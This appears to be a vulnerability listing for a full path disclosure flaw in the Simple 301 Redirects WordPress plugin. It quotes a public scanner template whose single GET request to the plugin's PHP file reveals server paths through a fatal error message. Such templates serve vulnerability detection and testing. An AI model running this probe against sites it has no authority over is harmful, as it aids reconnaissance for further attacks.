漏洞描述
Simple 301 Redirects WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
wp-simple-301-redirects-fpd: Simple 301 Redirects - Full Path Disclosure
PoC代码[已公开]
id: wp-simple-301-redirects-fpd
info:
name: Simple 301 Redirects - Full Path Disclosure
author: theamanrawat
severity: low
description: |
Simple 301 Redirects WordPress plugin contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
impact: |
Attackers can obtain sever file paths, aiding in further exploitation of the website.
reference:
- https://wordpress.org/plugins/simple-301-redirects/
metadata:
verified: true
max-requests: 1
public-www: "/wp-content/plugins/simple-301-redirects/"
tags: debug,wordpress,wp,wp-plugin,simple-301-redirects,fpd
http:
- method: GET
path:
- "{{BaseURL}}/plugins/simple-301-redirects/wp-simple-301-redirects.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "Fatal error", "Uncaught Error", "simple-301-redirects")'
condition: and
# digest: 4b0a00483046022100d8e053f519f371dbe7aeb3737a85335817bf31f98fe3fa29b584d450bcf8cba2022100f8878c1c8d1aa1c6b392a728981ed98e757fd92f06b71013a6202fd43d161240:922c64590222798bb761d5b6d8e72950